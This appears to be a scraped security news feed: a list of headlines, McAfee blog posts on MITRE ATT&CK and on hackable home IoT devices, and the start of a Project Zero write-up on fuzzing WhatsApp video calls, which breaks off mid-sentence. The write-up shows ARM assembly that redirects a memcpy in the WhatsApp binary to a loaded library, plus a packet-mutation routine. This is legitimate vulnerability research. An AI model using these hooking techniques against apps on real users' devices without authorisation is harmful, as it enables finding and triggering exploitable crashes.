Iranians indicted in Atlanta city government ransomware attack | Ars Technica
Report: FBI opens criminal investigation into net neutrality comment fraud | Ars Technica
Police arrest hacker behind WeChat ransomware attack - CGTN
A bug in Microsoft’s login system made it easy to hijack anyone’s Office account | TechCrunch
For the fourth month in a row, Microsoft patches Windows zero-day used in the wild | ZDNet
Hackers ramp up attacks on mining rigs before Ethereum price crashes into the gutter | ZDNet
OpSec mistake brings down network of Dark Web money counterfeiter | ZDNet
Google CEO Says No Plan to ‘Launch’ Censored Search Engine in China - Motherboard
Marriott to reimburse some guests for new passports after massive data breach | ZDNet
Eastern European banks lose tens of millions of dollars in Hollywood-style hacks | ZDNet
Industrial espionage fears arise over Chrome extension caught stealing browsing history | ZDNet
Hacker Fantastic on Twitter: ""open-source is more secure than closed-source because you can view the source code" ... GNU inetutils <= 1.9.4 telnet.c multiple overflows"
Your Apps Know Where You Were Last Night, and They’re Not Keeping It Secret - The New York Times
APPSEC CALIFORNIA 2019 - OWASP AppSec California 2019
Next Gen Pen Testing

A Quick Introduction to the MITRE ATT&CK Framework

If you’re an avid reader of threat trends or a fan of red team exercises, you’ve probably come across a reference to the MITRE ATT&CK framework in the last few months. If you have ever wondered what it was all about or if you’ve never heard of it but are interested in how you can improve your security posture, this blog is for you.

To start with, let’s explain what MITRE is. MITRE is a nonprofit organization founded in 1958 (and funded with federal tax dollars) that works on projects for a variety of U.S. government agencies, including the IRS, Department of Defense (DOD), Federal Aviation Administration (FAA), and National Institute of Standards and Technology (NIST). It is not a professional third-party cybersecurity testing agency, which is a common misconception. Its focus is to provide U.S. government agencies with essential deliverables—such as models, technologies and intellectual property—related to U.S. national security, including cybersecurity, healthcare, tax policy, etc. In the cybersecurity landscape, MITRE is mostly known for managing Common Vulnerabilities and Exposures (CVEs) for software vulnerabilities. Note that CVEs are pre-exploitation/defense, whereas the MITRE ATT&CK model is focused on post-exploitation only.

Your next question is probably around what MITRE ATT&CK is and what makes it a model or a framework. The name stands for: Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK). It is a curated knowledgebase and model for cyberadversary behavior, reflecting the various phases of an adversary’s attack lifecycle and the platforms they are known to target. The tactics and techniques looked at in the model are used to classify adversary actions by offense and defense, relating them to specific ways of defending against them. What began as an idea in 2010 during an experiment has since grown into a set of evolving resources for cybersecurity experts to contribute to and apply for red teaming, threat hunting, and other tasks. Security practitioners can harden their endpoint defenses and accurately assess themselves by using the model and the tools to help determine how well they are doing at detecting documented adversary behavior.
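Concretely, the knowledgebase is structured data: each technique has an ID, a name, and one or more tactics, and tooling filters on those fields. A toy illustration (these three technique IDs and names are real ATT&CK entries, but the list and schema here are deliberately simplified; the real data ships as STIX bundles from MITRE):

```python
# A tiny, illustrative slice of the ATT&CK knowledgebase.
TECHNIQUES = [
    {"id": "T1059", "name": "Command and Scripting Interpreter",
     "tactics": ["execution"]},
    {"id": "T1021", "name": "Remote Services",
     "tactics": ["lateral-movement"]},
    {"id": "T1003", "name": "OS Credential Dumping",
     "tactics": ["credential-access"]},
]

def by_tactic(tactic: str) -> list:
    """Return the technique IDs mapped to a given tactic."""
    return [t["id"] for t in TECHNIQUES if tactic in t["tactics"]]
```

This is the shape of query that red teams and detection engineers run constantly: "show me every documented technique under this tactic, and check which ones we can detect."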

If you’ve been in the security realm for a while, this may remind you somewhat of Lockheed Martin’s Cyber Kill Chain. It stated that attacks occur in stages and can be disrupted through controls established at each stage. It was also used to reveal the stages of a cyberattack. To understand the overlap of the two models, take a look at this figure:

In the figure above we see that the MITRE ATT&CK matrix model is essentially a subset of the Cyber Kill Chain, but it goes into depth describing the techniques used between the Deliver and Maintain stages. Both the Cyber Kill Chain and the MITRE ATT&CK model might look like linear processes, but they actually aren’t; attacks branch and loop. We have shown them in a linear fashion to make them easier to understand.

At McAfee, we embrace the MITRE model as a fabulous and detailed way to think about adversarial activity, especially APTs post-compromise, and are applying it to different levels and purposes in our organization. Specifically, we are engineering our endpoint products using the insights gained from MITRE ATT&CK to significantly enhance our fileless threat defense capabilities. Additionally, we are using it to inform our roadmaps and are actively contributing to the model by sharing newly discovered techniques used by adversaries. We are partnering with MITRE and were recently a core sponsor of the inaugural MITRE ATT&CKcon in the Washington, D.C. area.

Over the next few weeks, I’ll continue to go deeper into how MITRE ATT&CK matrix testing works, how you can use it, how it’s different from other testing methods, and how McAfee is investing in it.

The post A Quick Introduction to the MITRE ATT&CK Framework appeared first on McAfee Blogs.

12 Days of Hack-mas

2018 was a wild ride when it came to cybersecurity. While some hackers worked to source financial data, others garnered personal information to personalize cyberattacks. Some worked to get us to download malware in order to help them mine cryptocurrency or harness our devices to join their botnets. The ways in which they execute their attacks are becoming more sophisticated and harder to detect. 2019 shows no sign of slowing down when it comes to the sophistication and multitude of cyberattacks targeted toward consumers.

Between the apps and websites we use every day and the numerous connected devices we continue to add to our homes, there are more ways than ever in which our cybersecurity can be compromised. Let’s take a look at 12 common connected devices that are vulnerable to attacks (most of which our friends at the “Hackable?” podcast have demonstrated) and what we can do to protect what matters. This way, as we move into the new year, security is top of mind.

Connected Baby Monitors

When you have a child, security and safety fuel the majority of your thoughts. That’s why it’s terrifying to think that a baby monitor, meant to give you peace of mind, could get hacked. Our own “Hackable?” team illustrated exactly how easy it is. They performed a “man-in-the-middle” attack to intercept data from an IoT baby monitor. But the team didn’t stop there; next they overloaded the device with commands and completely crashed the system without warning a parent, potentially putting a baby in danger. If you’re a parent looking to bring baby tech into your home, always be on the lookout for updates, avoid knockoffs or brands you’re not familiar with, and change your passwords regularly.

Smart TVs

With a click of a button or by the sound of our voice, our favorite shows will play, pause, rewind ten seconds, and more – all thanks to smart TVs and streaming devices. But is there a sinister side? Turns out, there is. Some smart TVs can be controlled by cybercriminals by exploiting easy-to-find security flaws. By infecting a computer or mobile device with malware, a cybercriminal could gain control of your smart TV if your devices are using the same Wi-Fi. To prevent an attack, consider purchasing devices from mainstream brands that keep security in mind, and update associated software and apps regularly.

Home Wi-Fi Routers

Wi-Fi is the lifeblood of the 21st century; it’s become a necessity rather than a luxury. But your router is also a cybercriminal’s window into your home. Especially if you have numerous IoT devices hooked up to the same Wi-Fi, a hacker that successfully cracks into your network can get ahold of passwords and personal information, all of which can be used to gain access to your accounts, and launch spear phishing attacks against you to steal your identity or worse. Cybercriminals do this by exploiting weaknesses in your home network. To stay secure, consider a comprehensive security solution like McAfee® Secure Home Platform.

Health Devices and Apps

Digital health is set to dominate the consumer market in the next few years. Ranging from apps to hardware, the ways in which our health is being digitized vary, and so do the types of attacks that can be orchestrated. For example, on physical devices like pacemakers, malware can be implanted directly on the device, enabling a hacker to control it remotely and inflict real harm on patients. When it comes to apps like pedometers, a hacker could source information like your physical location or regular routines. Each of these far-from-benign scenarios highlights the importance of cybersecurity as the health market becomes increasingly reliant on technology and connectivity.

Smart Speakers

It seems like everyone nowadays has at least one smart speaker in their home. However, these speakers are always listening in, and if hacked, could be exploited by cybercriminals through spear phishing attacks. This can be done by spoofing actual websites, tricking users into thinking that they are receiving a message from an official source. But once the user clicks a link in the email, they’ve just given a cybercriminal access to their home network, and by extension, all devices connected to that network, smart speakers and all. To stay secure, start with protection on your router that extends to your network, change default passwords, and check for built-in security features.

Voice Assistants

Like smart speakers, voice assistants are always listening and, if hacked, could gain a wealth of information about you. But voice assistants are also often used as a central command hub, connecting other devices to them (including other smart speakers, smart lights or smart locks). Some people opt to connect accounts like food delivery, driver services, and shopping lists that use credit cards. If hacked, someone could gain access to your financial information or even access to your home. To keep cybercriminals out, consider a comprehensive security system, know which apps you can trust, and always keep your software up to date.

Connected Cars

Today, cars are essentially computers on wheels. Between backup cameras, video screens, GPS systems, and Wi-Fi networks, they have more electronics stacked in them than ever. The technology makes the experience smoother, but if it has a digital heartbeat, it’s hackable. In fact, an attacker can take control of your car a couple of ways: either by physically implanting a tiny device that grants access to your car through a phone, or, completely remotely, by leveraging a black-box tool and your car’s diagnostic port. Hacks can range anywhere from cranking the radio up to cutting the transmission or disabling the brakes. To stay secure, limit connectivity between your mobile devices and a car when possible, as phones are exposed to risks every day, and any time you connect one to your car, you put it at risk, too.

Smart Thermostats

A smart thermostat can regulate your home’s temperature and save you money by learning your preferences. But what if your friendly temperature regulator turned against you? If you don’t change your default, factory-set password and login information, a hacker could take control of your device and make it join a botnet.

Connected Doorbells

When we think high-tech, the first thing that comes to mind is most likely not a doorbell. But connected doorbells are becoming more popular, especially as IoT devices are more widely adopted in our homes. So how can these devices be hacked, exactly? In one case, hackers sent an official-looking email requesting that the device owner download the doorbell’s app, and the user unwittingly gave full access to the unwelcome guest. From there, the hackers could access call logs, the number of devices available, and even video files from past calls. Take heed from this hack; when setting up a new device, watch out for phishing emails and always make sure that an app is legitimate before you download it.

Smart Pet Cameras

We all love our furry friends and hate when we have to leave them behind as we head out the door. It’s comforting to know that we can keep an eye on them, even give them the occasional treat, through pet cameras. But this pet-nology can be hacked by cybercriminals to get an inside look at your home, as proven by the “Hackable?” crew. Through a device’s app, a white-hat hacker was able to access the product’s database and download photos and videos of other device owners. Talk about creepy. To keep prying eyes out of your private photos, get a comprehensive security solution for your home network and devices, avoid checking on your pet from unsecured Wi-Fi, and do your research on smart products you purchase for your pets.

Cell Phones

Mobile phones are one of the most vulnerable devices simply because they go everywhere you go. They essentially operate as a personal remote control to your digital life. On any given day, we access financial accounts, confirm doctor’s appointments, and communicate with family and friends. That’s why it’s shocking how surprisingly easy it is for cybercriminals to access the treasure trove of personal data on your cell phone. Phones can be compromised in a variety of ways; here are a few: accessing your personal information by way of public Wi-Fi (say, while you’re at an airport), implanting a bug, leveraging a flaw in the operating system, or infecting your device with malware by way of a bad link while surfing the web or browsing email. Luckily, you can help secure your device by using comprehensive security such as McAfee Total Protection, or by leveraging a VPN (virtual private network) if you find yourself needing to use public Wi-Fi.

Virtual Reality Headsets

Once something out of science fiction, virtual reality (VR) is now a high-tech reality for many. Surprisingly, despite being built on state-of-the-art technology, VR is quite hackable. As an example, through common and easy-to-execute tactics like phishing to prompt someone to download malware, white-hat hackers were able to infect a linked computer and run a command-and-control interface that manipulated the VR experience and disoriented the user. While this attack isn’t common yet, it could certainly start to gain traction as more VR headsets make their way into homes. To stay secure, be picky and only download software from reputable sources.

This is only the tip of the iceberg when it comes to hackable, everyday items. And while there’s absolutely no doubt that IoT devices certainly make life easier, what it all comes down to is control versus convenience. As we look toward 2019, we should ask ourselves, “what do we value more?”

Stay up-to-date on the latest trends by subscribing to our podcast, “Hackable?” and follow us on Twitter or Facebook.

The post 12 Days of Hack-mas appeared first on McAfee Blogs.

Adventures in Video Conferencing Part 3: The Even Wilder World of WhatsApp

Posted by Natalie Silvanovich, Project Zero

WhatsApp is another application that supports video conferencing that does not use WebRTC as its core implementation. Instead, it uses PJSIP, which contains some WebRTC code, but also contains a substantial amount of other code, and predates the WebRTC project. I fuzzed this implementation to see if it had similar results to WebRTC and FaceTime.

Fuzzing Set-up

PJSIP is open source, so it was easy to identify the PJSIP code in the Android WhatsApp binary. Since PJSIP uses the open source library libsrtp, I started off by opening the binary in IDA and searching for the string srtp_protect, the name of the function libsrtp uses for encryption. This led to a log entry emitted by a function that looked like srtp_protect. There was only one function in the binary that called this function, and it called memcpy soon before the call. Some log entries before the call contained the file name srtp_transport.c, which exists in the PJSIP repository. The log entries in the WhatsApp binary say that the function being called is transport_send_rtp2, and the PJSIP source only has a function called transport_send_rtp, but it looks similar to the function calling srtp_protect in WhatsApp, in that it has the same number of calls before and after the memcpy. Assuming that the code in WhatsApp is some variation of that code, the memcpy copies the entire unencrypted packet right before it is encrypted.

Hooking this memcpy seemed like a possible way to fuzz WhatsApp video calling. I started off by hooking memcpy for the entire app using a tool called Frida. This tool can easily hook native functions in Android applications, and I was able to see calls to memcpy from WhatsApp within minutes. Unfortunately though, video conferencing is very performance sensitive, and a delay sending video packets actually influences the contents of the next packet, so hooking every memcpy call didn’t seem practical. Instead, I decided to change the single memcpy to point to a function I wrote.

I started off by writing a function in assembly that loaded a library from the filesystem using dlopen, retrieved a symbol by calling dlsym and then called into the library. Frida was very useful in debugging this, as it could hook calls to dlopen and dlsym to make sure they were being called correctly. I overwrote a function in the WhatsApp GIF transcoder with this function, as it is only used in sending text messages, which I didn’t plan to do with this altered version. I then set the memcpy call to point to this function instead of memcpy, using this online ARM branch finder.

MOV             X21, X30
MOV             X22, X0
MOV             X23, X1
MOV             X20, X2
MOV             X1, #1
ADRP            X0, #aDataDataCom_wh@PAGE ; "/data/data/com.whatsapp/"
ADD             X0, X0, #aDataDataCom_wh@PAGEOFF ; "/data/data/com.whatsapp/"
BL              .dlopen
ADRP            X1, #aApthread@PAGE ; "apthread"
ADD             X1, X1, #aApthread@PAGEOFF ; "apthread"
BL              .dlsym
MOV             X8, X0
MOV             X0, X22
MOV             X1, X23
MOV             X2, X20
BLR             X8
MOV             X30, X21
The library loading function

I then wrote a library for Android which had the same parameters as memcpy, but fuzzed and copied the buffer instead of just copying it, and put it on the filesystem where it would be loaded by dlopen. I then tried making a WhatsApp call with this setup. The video call looked like it was being fuzzed and crashed in roughly fifteen minutes.
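The fuzzing library itself only has to corrupt a few bits of the outgoing packet while preserving its length, memcpy-style. A sketch of that mutation step in Python (the hooking is the assembly shown above; this is just the mutation logic, with the flip rate chosen arbitrarily):

```python
import random

def mutate(packet: bytes, rate: float = 0.005, seed=None) -> bytes:
    """Flip a small random subset of bits in a packet buffer.

    Mimics a fuzzing memcpy replacement: same length in, same length
    out, a few bits corrupted. Seeding makes a run reproducible.
    """
    rng = random.Random(seed)
    out = bytearray(packet)
    flips = max(1, int(len(out) * 8 * rate))
    # sample() picks distinct bit positions, so every flip sticks
    for bit in rng.sample(range(len(out) * 8), flips):
        out[bit // 8] ^= 1 << (bit % 8)
    return bytes(out)
```

Logging the seed (or the mutated buffer itself) per packet is what makes the replay step described next possible.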

Replay Set-up

To replay the packets I added logging to the library, so that each buffer that was altered would also be saved to a file. Then I created a second library that copied the logged packets into the buffer being copied instead of altering it. This required modifying the WhatsApp binary slightly, because the logged packet will usually not be the same size as the packet currently being sent. I changed the length of the hooked memcpy to be passed by reference instead of by value, and then had the library change the length to the length of the logged packet. This changed the value of the length so that it would be correct for the call to srtp_protect. Luckily, the buffer that the packet is copied into is a fixed length, so there is no concern that a valid packet will overflow the buffer length. This is a common design pattern in RTP processing that improves performance by reducing length checks. It was also helpful in modifying FaceTime to replay packets of varying length, as described